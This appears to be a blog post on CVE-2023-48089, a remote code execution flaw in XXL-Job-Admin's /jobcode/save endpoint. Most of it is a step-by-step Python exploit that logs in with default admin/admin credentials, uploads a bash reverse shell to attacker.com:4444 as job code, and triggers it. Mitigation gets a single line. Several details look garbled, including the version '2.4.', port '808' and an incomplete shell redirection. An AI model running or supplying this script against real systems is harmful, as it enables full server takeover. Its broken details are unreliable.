CVE-2023-48089 - Remote Code Execution in XXL-Job-Admin 2.4. via /xxl-job-admin/jobcode/save

In recent times, the open-source job scheduler XXL-JOB has gained popularity for its simple integration and robust features in Java environments. However, with increased usage comes greater attention from security researchers and, unfortunately, threat actors. In late 2023, a critical vulnerability — CVE-2023-48089 — was uncovered in XXL-Job-Admin version 2.4.. This flaw allows attackers to achieve Remote Code Execution (RCE) by abusing the /xxl-job-admin/jobcode/save API endpoint.

In this post, we’ll dive deep — with simple, exclusive language — into how this flaw works, show you real code snippets, explain the exploit’s steps, and direct you to key references. If you're running XXL-Job-Admin 2.4., read on, patch up, and stay secure!

XXL-Job-Admin includes an API endpoint

POST /xxl-job-admin/jobcode/save

This endpoint allows authenticated users to upload or update scripts associated with jobs. But the backend does not properly validate or sanitize uploaded code. As a result, an attacker with credentials (or possibly via default ones) can inject arbitrary code, which the scheduler then runs.

So, if an attacker can authenticate and POST malicious script content to this endpoint, they can make the server execute commands on their behalf — this is classic RCE.

Exploit Scenario

Let’s walk through how an attacker might exploit this. We provide a sample Python script using the popular requests library. This script logs in (with preset credentials), then posts a reverse shell as the job script.

Step 1: Log in

Suppose XXL-Job-Admin is running at http://target:808/xxl-job-admin/.

By default, the login endpoint is /xxl-job-admin/login. Credentials are often set as admin/admin or left weak. Get a session cookie by posting:

import requests

TARGET = "http://target:808/xxl-job-admin";
LOGIN = "/login"
USERNAME = "admin"
PASSWORD = "admin"

session = requests.Session()

login_data = {
    "userName": USERNAME,
    "password": PASSWORD,
    "ifRemember": "on"
}

resp = session.post(TARGET + LOGIN, data=login_data)
if "XXL_JOB_LOGIN_IDENTITY" in session.cookies:
    print("[+] Logged in successfully")
else:
    print("[-] Login failed")
    exit()

The attacker wants to upload a script containing dangerous code, like a reverse shell

# For Java jobs, the code might be Java code, but XXL-JOB also allows shell, Python, etc.
# Here's a bash reverse shell as an example:

malicious_script = """
#!/bin/bash
bash -i >& /dev/tcp/attacker.com/4444 >&1
"""

save_url = TARGET + "/jobcode/save"
data = {
    "id": "1",  # ID of target job (may be "1", "2", etc.; enumerating jobs is another step)
    "jobGroup": "1",
    "jobDesc": "Exploit RCE",
    "executorHandler": "shellHandler",
    "executorParam": "",
    "author": "attacker",
    "executorRouteStrategy": "FIRST",
    "executorBlockStrategy": "SERIAL_EXECUTION",
    "executorTimeout": "",
    "executorFailRetryCount": "",
    "glueType": "GLUE_SHELL",  # Shell job type
    "glueRemark": "exploit",
    "glueSource": malicious_script,    # Our payload!
    "triggerStatus": "1"
}

resp = session.post(save_url, data=data)
if resp.json().get("code") == 200:
    print("[+] Malicious code uploaded successfully!")
else:
    print("[-] Failed to upload code!")

Finally, the attacker can use the API to trigger the job, making the server run the uploaded script

trigger_url = TARGET + "/jobinfo/trigger"
data = {
    "id": "1",  # Target job ID
    "executorParam": "",
    "addressList": ""
}
resp = session.post(trigger_url, data=data)
if resp.json().get("code") == 200:
    print("[+] Job triggered, RCE exploited!")
else:
    print("[-] Failed to trigger job.")

Result: The server connects back to attacker.com:4444, handing over an interactive shell.

This bug was disclosed and tracked under

- CVE-2023-48089
- Original security advisory
- PacketStorm advisory

Mitigation Advice

- Upgrade XXL-Job-Admin to the latest version (release notes).

Conclusion

CVE-2023-48089 is a textbook example of what happens when job code upload features lack proper security validation: attackers can go from “authenticated user” to total server compromise with just a few API requests. XXL-Job-Admin users should patch immediately, review their installations, and control admin access tightly.

Stay secure! If you'd like a deeper dive or have questions about securing XXL-Job, let us know.


> References:
> - GitHub: XXL-JOB Issue #2957
> - CVE-2023-48089 - NVD
> - PacketStorm Release


*Author: AI Security Research, 2024 — Exclusive long-read for you!*

Timeline

Published on: 11/15/2023 15:15:07 UTC
Last modified on: 11/21/2023 02:37:44 UTC